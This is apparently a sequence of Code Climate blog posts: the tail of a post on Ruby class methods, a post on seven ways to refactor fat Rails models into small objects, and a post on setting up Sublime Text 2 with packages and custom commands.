That is true. In that case I simply define a convenience class method that builds the object and delegates down. In fact, that is one of the few cases I think class methods are okay. You can have your cake and eat it too, in this regard.
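A sketch of such a convenience wrapper:

```ruby
class SyncToAnalyticsService
  # Convenience: as short to call as a class method, but an instance underneath
  def self.perform(account)
    new(account).perform
  end

  def initialize(account)
    @account = account
  end

  def perform
    @account # ... the real syncing work would happen here
  end
end
```

Callers keep the short `SyncToAnalyticsService.perform(account)` form, while tests and collaborators can still build and inject instances.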

Wrapping Up

Begin with an object instance, even if it doesn’t have state or multiple methods right away. If you come back to change it later, you (and your team) will be more likely to refactor. If it never changes, the difference between the class method approach and the instance is negligible, and you certainly won’t be any worse off.

There are very few cases where I am comfortable with class methods in my code. They are either convenience methods, wrapping the act of initializing an instance and invoking a method on it, or extremely simple factory methods (no more than two lines), to allow collaborators to more easily construct objects.

What do you think? Which form do you prefer and why? Are there any pros/cons that I missed? Post a comment and let me know what you think!

P.S. If this sort of thing interests you, and you want to read more articles like it, you might like the Code Climate newsletter (see below). It’s just one email a month, and includes content about refactoring and object design with a Ruby focus.

Thanks to Doug Cole, Don Morrison and Josh Susser for reviewing this post.

When teams use Code Climate to improve the quality of their Rails applications, they learn to break the habit of allowing models to get fat. “Fat models” cause maintenance issues in large apps. Only incrementally better than cluttering controllers with domain logic, they usually represent a failure to apply the Single Responsibility Principle (SRP). “Anything related to what a user does” is not a single responsibility.

Early on, SRP is easier to apply. ActiveRecord classes handle persistence, associations and not much else. But bit-by-bit, they grow. Objects that are inherently responsible for persistence become the de facto owner of all business logic as well. And a year or two later you have a User class with over 500 lines of code, and hundreds of methods in its public interface. Callback hell ensues.

As you add more intrinsic complexity (read: features!) to your application, the goal is to spread it across a coordinated set of small, encapsulated objects (and, at a higher level, modules) just as you might spread cake batter across the bottom of a pan. Fat models are like the big clumps you get when you first pour the batter in. Refactor to break them down and spread out the logic evenly. Repeat this process and you’ll end up with a set of simple objects with well defined interfaces working together in a veritable symphony.

You may be thinking:


“But Rails makes it really hard to do OOP right!”

I used to believe that too. But after some exploration and practice, I realized that Rails (the framework) doesn’t impede OOP all that much. It’s the Rails “conventions” that don’t scale, or, more specifically, the lack of conventions for managing complexity beyond what the Active Record pattern can elegantly handle. Fortunately, we can apply OO-based principles and best practices where Rails is lacking.

Don’t Extract Mixins from Fat Models

Let’s get this out of the way. I discourage pulling sets of methods out of a large ActiveRecord class into “concerns”, or modules that are then mixed in to only one model. I once heard someone say:

“Any application with an app/concerns directory is concerning.”

And I agree. Prefer composition to inheritance. Using mixins like this is akin to “cleaning” a messy room by dumping the clutter into six separate junk drawers and slamming them shut. Sure, it looks cleaner at the surface, but the junk drawers actually make it harder to identify and implement the decompositions and extractions necessary to clarify the domain model.

Now on to the refactorings!

1. Extract Value Objects

Value Objects are simple objects whose equality is dependent on their value rather than an identity. They are usually immutable. Date, URI, and Pathname are examples from Ruby’s standard library, but your application can (and almost certainly should) define domain-specific Value Objects as well. Extracting them from ActiveRecords is low hanging refactoring fruit.

In Rails, Value Objects are great when you have an attribute or a small group of attributes that have logic associated with them. Anything more than basic text fields and counters is a candidate for Value Object extraction.

For example, a text messaging application I worked on had a PhoneNumber Value Object. An e-commerce application needs a Money class. Code Climate has a Value Object named Rating that represents a simple A - F grade that each class or module receives. I could (and originally did) use an instance of a Ruby String, but Rating allows me to combine behavior with the data:
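A sketch of what such a Value Object might look like (the thresholds in the factory method are made up for illustration):

```ruby
class Rating
  include Comparable

  # Factory: map a "remediation cost" to a grade (thresholds invented here)
  def self.from_remediation_cost(cost)
    case cost
    when 0..20  then new("A")
    when 21..40 then new("B")
    when 41..60 then new("C")
    when 61..80 then new("D")
    else             new("F")
    end
  end

  def initialize(letter)
    @letter = letter.to_s
  end

  def better_than?(other)
    self > other
  end

  def worse_than?(other)
    self < other
  end

  # "A" outranks "B", so the comparison is reversed
  def <=>(other)
    other.to_s <=> to_s
  end

  # Defining #hash and #eql? lets a Rating serve as a Hash key
  def hash
    @letter.hash
  end

  def eql?(other)
    to_s == other.to_s
  end

  def to_s
    @letter
  end
end
```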

Every ConstantSnapshot then exposes an instance of Rating in its public interface:
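A sketch of that delegation, with a pared-down Rating stand-in so it runs on its own:

```ruby
# Minimal Rating stand-in for this sketch:
class Rating
  attr_reader :letter

  def self.from_remediation_cost(cost)
    new(cost <= 20 ? "A" : "B") # made-up threshold
  end

  def initialize(letter)
    @letter = letter
  end
end

class ConstantSnapshot
  attr_reader :remediation_cost

  def initialize(remediation_cost)
    @remediation_cost = remediation_cost
  end

  # The snapshot's grade is computed once and delegated to the Value Object
  def rating
    @rating ||= Rating.from_remediation_cost(remediation_cost)
  end
end
```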

Beyond slimming down the ConstantSnapshot class, this has a number of advantages:

  • The #worse_than? and #better_than? methods provide a more expressive way to compare ratings than Ruby’s built-in operators (e.g. < and >).
  • Defining #hash and #eql? makes it possible to use a Rating as a hash key. Code Climate uses this to idiomatically group constants by their ratings using Enumerable#group_by.
  • The #to_s method allows me to interpolate a Rating into a string (or template) without any extra work.
  • The class definition provides a convenient place for a factory method, returning the correct Rating for a given “remediation cost” (the estimated time it would take to fix all of the smells in a given class).

2. Extract Service Objects

Some actions in a system warrant a Service Object to encapsulate their operation. I reach for Service Objects when an action meets one or more of these criteria:

  • The action is complex (e.g. closing the books at the end of an accounting period)
  • The action reaches across multiple models (e.g. an e-commerce purchase using Order, CreditCard and Customer objects)
  • The action interacts with an external service (e.g. posting to social networks)
  • The action is not a core concern of the underlying model (e.g. sweeping up outdated data after a certain time period).
  • There are multiple ways of performing the action (e.g. authenticating with an access token or password). This is the Gang of Four Strategy pattern.

As an example, we could pull a User#authenticate method out into a UserAuthenticator:
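A sketch of that extraction. The real thing would compare a BCrypt digest; SHA-256 from the standard library stands in here so the example is self-contained:

```ruby
require "digest"

class UserAuthenticator
  def initialize(user)
    @user = user
  end

  # Returns the user on success, false otherwise
  def authenticate(unencrypted_password)
    return false unless @user

    if Digest::SHA256.hexdigest(unencrypted_password) == @user.password_digest
      @user
    else
      false
    end
  end
end
```

A controller’s create action would then call something like `UserAuthenticator.new(user).authenticate(params[:password])` and set the session on success.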

And the SessionsController would look like this:

3. Extract Form Objects

When multiple ActiveRecord models might be updated by a single form submission, a Form Object can encapsulate the aggregation. This is far cleaner than using accepts_nested_attributes_for, which, in my humble opinion, should be deprecated. A common example would be a signup form that results in the creation of both a Company and a User:
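A plain-Ruby sketch of such a Form Object (simple accessors stand in for Virtus-style attributes, and the model classes are stubbed so it runs on its own):

```ruby
# Stand-ins for the ActiveRecord models:
class Company
  def self.create!(attributes)
    new
  end
end

class User
  def self.create!(attributes)
    new
  end
end

class Signup
  attr_accessor :name, :company_name, :email

  def initialize(attributes = {})
    attributes.each { |key, value| public_send("#{key}=", value) }
  end

  # Quacks enough like an ActiveRecord for the controller's purposes
  def save
    return false unless valid?
    persist!
    true
  end

  def valid?
    [company_name, name, email].none? { |value| value.nil? || value.strip.empty? }
  end

  private

  def persist!
    @company = Company.create!(name: company_name)
    @user    = User.create!(name: name, email: email, company: @company)
  end
end
```

The controller then treats it like any model: build it from the form params and call `save`.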

I’ve started using Virtus in these objects to get ActiveRecord-like attribute functionality. The Form Object quacks like an ActiveRecord, so the controller remains familiar:

This works well for simple cases like the above, but if the persistence logic in the form gets too complex you can combine this approach with a Service Object. As a bonus, since validation logic is often contextual, it can be defined exactly where it matters instead of needing to guard validations in the ActiveRecord itself.

4. Extract Query Objects

For complex SQL queries littering the definition of your ActiveRecord subclass (either as scopes or class methods), consider extracting query objects. Each query object is responsible for returning a result set based on business rules. For example, a Query Object to find abandoned trials might look like this:
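A sketch of the shape (the business rule, an account with no plan and no invites, is illustrative, and a tiny in-memory relation stands in for ActiveRecord::Relation so the sketch runs on its own):

```ruby
class AbandonedTrialQuery
  def initialize(relation)
    @relation = relation
  end

  # Yields each account matching the "abandoned trial" business rule
  def find_each(&block)
    @relation.where(plan: nil, invites_count: 0).find_each(&block)
  end
end

# Tiny in-memory stand-in for an ActiveRecord::Relation:
class FakeRelation
  def initialize(rows)
    @rows = rows
  end

  def where(conditions)
    FakeRelation.new(@rows.select { |row| conditions.all? { |key, value| row[key] == value } })
  end

  def find_each(&block)
    @rows.each(&block)
  end
end
```

In the app, the input would be a real relation, e.g. `AbandonedTrialQuery.new(Account.all)`; passing an already-narrowed relation is what makes composition fall out naturally.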

You might use it in a background job to send emails:

Since ActiveRecord::Relation instances are first class citizens as of Rails 3, they make a great input to a Query Object. This allows you to combine queries using composition:

Don’t bother testing a class like this in isolation. Use tests that exercise the object and the database together to ensure the correct rows are returned in the right order and any joins or eager loads are performed (e.g. to avoid N + 1 query bugs).

5. Introduce View Objects

If logic is needed purely for display purposes, it does not belong in the model. Ask yourself, “If I were implementing an alternative interface to this application, like a voice-activated UI, would I need this?”. If not, consider putting it in a helper or (often better) a View object.

For example, the donut charts in Code Climate break down class ratings based on a snapshot of the codebase (e.g. Rails on Code Climate) and are encapsulated as a View:
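A sketch of the idea, reduced to its essentials (the name and data shape are illustrative):

```ruby
# A View object that turns a list of letter grades into donut-chart segments.
class RatingsDonut
  def initialize(ratings)
    @ratings = ratings
  end

  # Fraction of the donut occupied by each grade, e.g. {"A" => 0.5, ...}
  def segments
    total = @ratings.size.to_f
    @ratings.tally.transform_values { |count| count / total }
  end
end
```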

I often find a one-to-one relationship between Views and ERB (or Haml/Slim) templates. This has led me to start investigating implementations of the Two Step View pattern that can be used with Rails, but I don’t have a clear solution yet.

Note: The term “Presenter” has caught on in the Ruby community, but I avoid it for its baggage and conflicting use. The “Presenter” term was introduced by Jay Fields to describe what I refer to above as “Form Objects”. Also, Rails unfortunately uses the term “view” to describe what are otherwise known as “templates”. To avoid ambiguity, I sometimes refer to these View objects as “View Models”.

6. Extract Policy Objects

Sometimes complex read operations might deserve their own objects. In these cases I reach for a Policy Object. This allows you to keep tangential logic, like which users are considered active for analytics purposes, out of your core domain objects. For example:
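A sketch of such a Policy Object (the stand-in user and the plain-Ruby two-week constant are illustrative):

```ruby
# Illustrative stand-in user so the sketch runs on its own:
FakeUser = Struct.new(:confirmed, :last_login_at) do
  def email_confirmed?
    confirmed
  end
end

class ActiveUserPolicy
  TWO_WEEKS = 14 * 24 * 60 * 60 # plain-Ruby stand-in for 14.days

  def initialize(user)
    @user = user
  end

  def active?
    @user.email_confirmed? && @user.last_login_at > Time.now - TWO_WEEKS
  end
end
```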

This Policy Object encapsulates one business rule, that a user is considered active if they have a confirmed email address and have logged in within the last two weeks. You can also use Policy Objects for a group of business rules like an Authorizer that regulates which data a user can access.

Policy Objects are similar to Service Objects, but I use the term “Service Object” for write operations and “Policy Object” for reads. They are also similar to Query Objects, but Query Objects focus on executing SQL to return a result set, whereas Policy Objects operate on domain models already loaded into memory.

7. Extract Decorators

Decorators let you layer on functionality to existing operations, and therefore serve a similar purpose to callbacks. For cases where callback logic only needs to run in some circumstances or including it in the model would give the model too many responsibilities, a Decorator is useful.

Posting a comment on a blog post might trigger a post to someone’s Facebook wall, but that doesn’t mean the logic should be hard wired into the Comment class. One sign you’ve added too many responsibilities in callbacks is slow and brittle tests or an urge to stub out side effects in wholly unrelated test cases.

Here’s how you might extract Facebook posting logic into a Decorator:
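A sketch of that Decorator (the comment and wall collaborators are stubbed stand-ins so it runs on its own):

```ruby
# Stand-ins: a comment that "saves" and a wall API double.
Comment = Struct.new(:author, :text) do
  def save
    true # pretend persistence succeeded
  end
end

class FakeWall
  attr_reader :posts

  def initialize
    @posts = []
  end

  def post(message)
    @posts << message
  end
end

class FacebookCommentNotifier
  def initialize(comment, wall)
    @comment = comment
    @wall    = wall
  end

  # Same interface as Comment#save, with posting layered on top
  def save
    @comment.save && post_to_wall
  end

  private

  def post_to_wall
    @wall.post("#{@comment.author} commented: #{@comment.text}")
    true
  end
end
```

A controller builds `FacebookCommentNotifier.new(comment, wall)` and calls `save` exactly as it would on the bare comment.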

And how a controller might use it:

Decorators differ from Service Objects because they layer on responsibilities to existing interfaces. Once decorated, collaborators just treat the FacebookCommentNotifier instance as if it were a Comment. In its standard library, Ruby provides a number of facilities to make building decorators easier with metaprogramming.

Wrapping Up

Even in a Rails application, there are many tools to manage complexity in the model layer. None of them require you to throw out Rails. ActiveRecord is a fantastic library, but any pattern breaks down if you depend on it exclusively. Try limiting your ActiveRecords to persistence behavior. Sprinkle in some of these techniques to spread out the logic in your domain model and the result will be a much more maintainable application.

You’ll also note that many of the patterns described here are quite simple. The objects are just “Plain Old Ruby Objects” (POROs) used in different ways. And that’s part of the point and the beauty of OOP. Not every problem needs to be solved by a framework or library, and naming matters a great deal.

What do you think of the seven techniques I presented above? What are your favorites and why? Have I missed any? Let me know in the comments!

P.S. If you found this post useful, you may want to subscribe to our email newsletter (see below). It’s low volume, and includes content about OOP and refactoring Rails applications like this.

Further Reading

Thank you to Steven Bristol, Piotr Solnica, Don Morrison, Jason Roelofs, Giles Bowkett, Justin Ko, Ernie Miller, Steve Klabnik, Pat Maddox, Sergey Nartimov and Nick Gauthier for reviewing this post.

Matz has said he wants Ruby to be the “80% language”, the ideal tool for 80% of software development. After switching from TextMate to Sublime Text 2 (ST2) a few months ago, I believe it’s the “80% editor”. You should switch to it, especially if you’re using TextMate.

Why Sublime Text 2?

  • Speed. It’s got the responsiveness of Vim/Emacs but in a full GUI environment. It doesn’t freeze/beachball. No need to install a special plugin just to have a workable “Find In Project” solution.
  • Polish. Some examples: Quit with one keystroke and windows and unsaved buffers are retained when you restart. Searching for files by name includes fuzzy matching and directory names. Whitespace is trimmed and newlines are added at the end of files. Configuration changes are applied instantly.
  • Split screen. I never felt like I missed this that much with TextMate, but I really appreciate it now. It’s ideal for having a class and unit test side-by-side on a 27-inch monitor.
  • Extensibility. The Python API is great for easily building your own extensions. There’s lots of example code in the wild to learn from. (More about this later.) ST2 supports TextMate snippets and themes out-of-the-box.
  • Great for pair programming. TextMate people feel right at home. Vim users can use Vintage mode. When pairing with Vim users, they use command mode when they are driving. I just switch out of command mode and everything “just works”. (It also works on Linux, if that’s your thing.)
  • Updates. This is mainly just a knock on TextMate, but it’s comforting to see new dev builds pushed every couple weeks. The author also seems to be quite responsive in the user community. A build already shipped with support for retina displays, which I believe is scheduled for a TextMate release in 2014.

Getting Started

I’ve helped a handful of new ST2 users get setup over the past few months. Here are the steps I usually follow to take a new install from good to awesome:

  1. Install the subl command line tool. Assuming ~/bin is in your path:

ln -s "/Applications/Sublime Text 2.app/Contents/SharedSupport/bin/subl" ~/bin/subl

     It works like mate, but has more options. Check subl --help.
  2. Install Package Control. Package Control makes it easy to install/remove/upgrade ST2 packages. Open the ST2 console with Ctrl+` (like Quake). Then paste this Python code from this page and hit enter. Reboot ST2. (You only need to do this once. From now on you’ll use Package Control to manage ST2 packages.)
  3. Install the Soda theme. This dramatically improves the look and feel of the editor. Use Package Control to install the theme:

     * Press ⌘⇧P to open the Command Palette.
     * Select "Package Control: Install Package" and hit Enter.
     * Type "Theme - Soda" and hit Enter to install the Soda package.

  4. Start with a basic Settings file. You can use mine, which will activate the Soda Light theme. Reboot Sublime Text 2 so the Soda theme applies correctly. You can browse the default settings that ship with ST2 by choosing “Sublime Text 2” > “Preferences…” > “Settings – Default” to learn what you can configure.
  5. Install more packages. My essentials are SCSS, RSpec, DetectSyntax and Git. DetectSyntax solves the problem of ensuring your RSpec, Rails and regular Ruby files open in the right mode.
  6. Install CTags. CTags let you quickly navigate to code definitions (classes, methods, etc.). First:

     $ brew install ctags

     Then use Package Control to install the CTags ST2 package. Check out the default CTags key bindings to see what you can do.

Leveling Up with Custom Commands

Sublime Text 2 makes it dead simple to write your own commands and key bindings in Python. Here are some custom bindings that I use:

  • Copy the path of the current file to the clipboard. Source
  • Close all tabs except the current one (reduces “tab sprawl”). Source
  • Switch between test files and class definitions (much faster than TextMate). Source
  • Compile CoffeeScript to JavaScript and display in a new buffer. Source

New key bindings are installed by dropping Python class files in ~/Library/Application Support/Sublime Text 2/Packages/User and then binding them from Default (OSX).sublime-keymap in the same directory. The ST2 Unofficial Documentation has more details.

Neil Sarkar, my colleague, wrote most of the code for all of the above within a few weeks of switching to ST2.

Running RSpec from Sublime Text 2

This is my favorite part of my Sublime Text 2 config. I’ll admit: Out of the box (even with the RSpec package installed), ST2 sucks for running tests. Fortunately, Neil wrote a Python script that makes running RSpec from Sublime Text 2 much better than running it from TextMate via the RSpec bundle.

With this script installed, you can bind ⌘R to run the current file and ⌘⇧R to run the current test. The tests will run in Terminal. This is great for a number of reasons:

  • You can use any RSpec formatter and get nice, colored output.
  • Adding calls to debugger or binding.pry works. No need to change how you run your tests when you want to debug.
  • Window management. It’s smart enough to reuse the Terminal window for new test runs if you don’t close it. I put my Terminal window on the right 40% of my monitor.

This has really improved my TDD workflow when working on individual classes.

More Resources

  • Be sure to check out Brandon Keepers’ post on getting started with ST2.
  • This article on NetTuts has some good tips. (Although it’s a little out of date.)
  • My entire ST2 user directory is on GitHub, as is Neil’s.
  • You can search for ST2 packages here. Don’t be afraid to dive into their source – it’s usually quite approachable.

If you’ve tried Sublime Text 2, what did you think? What packages, key bindings, etc. are your favorites? What do you miss most from other editors?
